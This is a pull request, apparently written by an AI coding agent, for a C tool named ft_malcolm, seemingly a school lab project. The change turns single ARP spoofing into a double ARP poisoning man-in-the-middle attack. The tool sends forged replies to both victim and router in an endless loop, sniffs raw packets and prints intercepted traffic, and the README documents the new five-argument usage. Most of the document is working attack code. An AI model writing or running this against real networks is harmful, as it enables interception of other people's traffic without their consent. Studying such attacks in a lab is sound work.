### PR TITLE
Add double ARP spoofing example

### DIFF
--- a/README.md
+++ b/README.md
@@ -53,8 +53,9 @@ La commande suivante permet d’exécuter le programme :
 
 Le programme réalise désormais un **double ARP spoofing** : il trompe à la fois
 la victime et le routeur en envoyant deux réponses ARP falsifiées. Après
-l'empoisonnement, il affiche quelques paquets IP interceptés afin de montrer les
-données récupérées.
+l'empoisonnement, les réponses sont renvoyées en boucle pour maintenir
+l'attaque et quelques paquets IP interceptés sont affichés. Utilisez **Ctrl+C**
+pour interrompre le programme.
 
 ## Récupération et envoi des informations en C
 

--- a/README.md
+++ b/README.md
@@ -39,16 +39,22 @@ Le programme prend **quatre arguments** en entrée :
 
 1. `ip_source` → L’adresse IP que l’on veut usurper.  
 2. `mac_source` → L’adresse MAC qui sera associée à cette IP (spoofée).  
-3. `ip_cible` → L’adresse IP de la cible (l’appareil que l’on veut tromper).  
+3. `ip_cible` → L’adresse IP de la cible (l’appareil que l’on veut tromper).
 4. `mac_cible` → L’adresse MAC de la cible.
+5. `mac_routeur` → L’adresse MAC réelle du routeur/gateway.
 
 ### Exécution du programme
 
 La commande suivante permet d’exécuter le programme :
 
 ```sh
-./ft_malcolm <ip_source> <mac_source> <ip_cible> <mac_cible>
+./ft_malcolm <ip_source> <mac_source> <ip_cible> <mac_cible> <mac_routeur>
 ```
+
+Le programme réalise désormais un **double ARP spoofing** : il trompe à la fois
+la victime et le routeur en envoyant deux réponses ARP falsifiées. Après
+l'empoisonnement, il affiche quelques paquets IP interceptés afin de montrer les
+données récupérées.
 
 ## Récupération et envoi des informations en C
 

--- a/requirements/pirate/srcs/include/arp_spoofing.h
+++ b/requirements/pirate/srcs/include/arp_spoofing.h
@@ -70,7 +70,7 @@ typedef enum e_interface_type {
 bool    get_arp_request(const t_arp_packet *arp_request, const char *source_ip);
 int     ft_strcmp(const char *s1, const char *s2);
 char	*ft_strtok(char *str, const char *delim);
-bool    parsing_arg(int ac, char **av, t_arp_packet *arp_reponse);
+bool    parsing_arg(int ac, char **av, t_arp_packet *arp_reponse, uint8_t router_mac[6]);
 
 // Fonctions de vérification et de conversion
 int     ft_isalpha(int c);

--- a/requirements/pirate/srcs/main.c
+++ b/requirements/pirate/srcs/main.c
@@ -189,6 +189,21 @@ void sniff_packets(int sock_raw)
     }
 }
 
+void maintain_spoof(int sock_raw,
+                    const t_ethernet_frame *victim_frame,
+                    const t_ethernet_frame *router_frame,
+                    const char *iface)
+{
+    printf("[INFO] Maintien de l'attaque ARP en cours (Ctrl+C pour arrêter)...\n");
+    while (true)
+    {
+        send_arp_frame(sock_raw, victim_frame, iface);
+        send_arp_frame(sock_raw, router_frame, iface);
+        sniff_packets(sock_raw);
+        sleep(2);
+    }
+}
+
 
 
 int main(int argc, char *argv[])
@@ -234,8 +249,7 @@ int main(int argc, char *argv[])
                 t_ethernet_frame frame_r = build_eth_frame(&router_reply);
                 send_arp_frame(sock_raw, &frame_r, iface);
                 printf("[INFO] ARP Reply envoyé au routeur !\n");
-                sniff_packets(sock_raw);
-                break ;
+                maintain_spoof(sock_raw, &frame, &frame_r, iface);
             }
         }
     }

--- a/requirements/pirate/srcs/main.c
+++ b/requirements/pirate/srcs/main.c
@@ -9,8 +9,10 @@
 #include <stdio.h>
 #include <arpa/inet.h>
 #include <string.h>
+#include <netinet/ip.h>
 
 static int g_sock_raw = -1;
+static uint8_t g_router_mac[6];
 
 void sigint_handler(int signum)
 {
@@ -125,7 +127,7 @@ t_ethernet_frame build_eth_frame(const t_arp_packet *arp_reply)
 }
 
 
-t_arp_packet build_arp_reply(const t_arp_packet *arp_request, 
+t_arp_packet build_arp_reply(const t_arp_packet *arp_request,
     const t_arp_packet *user_input)
 {
     t_arp_packet reply;
@@ -145,6 +147,48 @@ t_arp_packet build_arp_reply(const t_arp_packet *arp_request,
     return reply;
 }
 
+t_arp_packet build_arp_reply_router(const t_arp_packet *user_input)
+{
+    t_arp_packet reply;
+
+    reply.htype  = htons(1);
+    reply.ptype  = htons(0x0800);
+    reply.hlen   = 6;
+    reply.plen   = 4;
+    reply.opcode = htons(ARPOP_REPLY);
+
+    /* On se fait passer pour la victime */
+    ft_memcpy(reply.sender_ip,  user_input->target_ip,  4);
+    ft_memcpy(reply.sender_mac, user_input->sender_mac, 6);
+    ft_memcpy(reply.target_ip,  user_input->sender_ip,  4);
+    ft_memcpy(reply.target_mac, g_router_mac, 6);
+    return reply;
+}
+
+void sniff_packets(int sock_raw)
+{
+    char buffer[1600];
+    struct ethhdr *eth;
+    struct iphdr  *ip;
+
+    printf("[INFO] Listening for intercepted IP packets (Ctrl+C to stop)...\n");
+    for (int i = 0; i < 5; i++)
+    {
+        ssize_t len = recvfrom(sock_raw, buffer, sizeof(buffer), 0, NULL, NULL);
+        if (len <= 0)
+            continue;
+        eth = (struct ethhdr *)buffer;
+        if (ntohs(eth->h_proto) != ETH_P_IP)
+            continue;
+        ip = (struct iphdr *)(buffer + sizeof(struct ethhdr));
+        struct in_addr s, d;
+        s.s_addr = ip->saddr;
+        d.s_addr = ip->daddr;
+        printf("Packet %d: %s -> %s | size %zd bytes\n", i + 1,
+               inet_ntoa(s), inet_ntoa(d), len);
+    }
+}
+
 
 
 int main(int argc, char *argv[])
@@ -156,7 +200,7 @@ int main(int argc, char *argv[])
     t_arp_packet    *arp_pkt;
 
     signal(SIGINT, sigint_handler);
-    if (!parsing_arg(argc, argv, &reponse))
+    if (!parsing_arg(argc, argv, &reponse, g_router_mac))
         return EXIT_FAILURE;
     int sock_raw = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
     if (sock_raw < 0) {
@@ -182,10 +226,15 @@ int main(int argc, char *argv[])
             t_arp_packet arp_reply = build_arp_reply(arp_pkt, &reponse);
             t_ethernet_frame frame  = build_eth_frame(&arp_reply);
             print_ethernet_frame(&frame);
-                ssize_t sent = send_arp_frame(sock_raw, &frame, iface);
+            ssize_t sent = send_arp_frame(sock_raw, &frame, iface);
             if (sent > 0)
             {
                 printf("[INFO] ARP Reply envoyé à la victime !\n");
+                t_arp_packet router_reply = build_arp_reply_router(&reponse);
+                t_ethernet_frame frame_r = build_eth_frame(&router_reply);
+                send_arp_frame(sock_raw, &frame_r, iface);
+                printf("[INFO] ARP Reply envoyé au routeur !\n");
+                sniff_packets(sock_raw);
                 break ;
             }
         }

--- a/requirements/pirate/srcs/parse.c
+++ b/requirements/pirate/srcs/parse.c
@@ -3,14 +3,15 @@
 #include <stdlib.h>
 #include <stdio.h>
 
-// ./ft_malcolm <IP_SOURCE> <MAC_SOURCE> <IP_CIBLE> <MAC_CIBLE>
+// ./ft_malcolm <IP_SOURCE> <MAC_SOURCE> <IP_CIBLE> <MAC_CIBLE> <MAC_ROUTEUR>
 
 
 // IP_SOURCE : l’IP que tu veux usurper (par ex. celle du routeur, 172.18.0.3).
 // MAC_SOURCE : la « fausse » MAC que tu veux associer à l’IP usurpée (par ex. aa:bb:cc:dd:ee:ff).
 
 // IP_CIBLE : l’IP de la machine que tu veux tromper (la victime, par ex. 172.18.0.4).
-// MAC_CIBLE : la MAC réelle de la victime (par ex. f2:65:30:b8:bc:61).
+// MAC_CIBLE   : la MAC réelle de la victime (par ex. f2:65:30:b8:bc:61).
+// MAC_ROUTEUR : la MAC réelle du routeur/gateway (par ex. 02:42:ac:12:00:03).
 
 bool parsing_ip(char *ip_arg, uint8_t *ip_field)
 {
@@ -61,10 +62,10 @@ bool parsing_mac(char *mac_arg, uint8_t *mac_field)
 }
 
 
-bool parsing_arg(int ac, char **av, t_arp_packet *arp_reponse)
+bool parsing_arg(int ac, char **av, t_arp_packet *arp_reponse, uint8_t router_mac[6])
 {
-    if (ac != 5) {
-        fprintf(stderr, "Usage: %s <ip_source> <mac_source> <ip_cible> <mac_cible>\n", av[0]);
+    if (ac != 6) {
+        fprintf(stderr, "Usage: %s <ip_source> <mac_source> <ip_cible> <mac_cible> <mac_routeur>\n", av[0]);
         return (false);
     }
     /* Initialisation complète de la structure */
@@ -78,7 +79,8 @@ bool parsing_arg(int ac, char **av, t_arp_packet *arp_reponse)
     if (!parsing_ip(av[1], arp_reponse->sender_ip) ||
         !parsing_mac(av[2], arp_reponse->sender_mac) ||
         !parsing_ip(av[3], arp_reponse->target_ip) ||
-        !parsing_mac(av[4], arp_reponse->target_mac))
+        !parsing_mac(av[4], arp_reponse->target_mac) ||
+        !parsing_mac(av[5], router_mac))
         return (false);
     /* Ajout pour s'assurer que l'entrée ARP n'est pas invalidée */
     if (ft_memcmp(arp_reponse->target_mac, "\x00\x00\x00\x00\x00\x00", 6) == 0)


### PR DESCRIPTION
## Summary
- implement double ARP spoofing: send replies to victim and router
- show intercepted packets
- parse router MAC as new argument
- document new option and behaviour in README

## Testing
- `make re`

------
https://chatgpt.com/codex/tasks/task_e_6847624566e0832e935725ccbd8a230e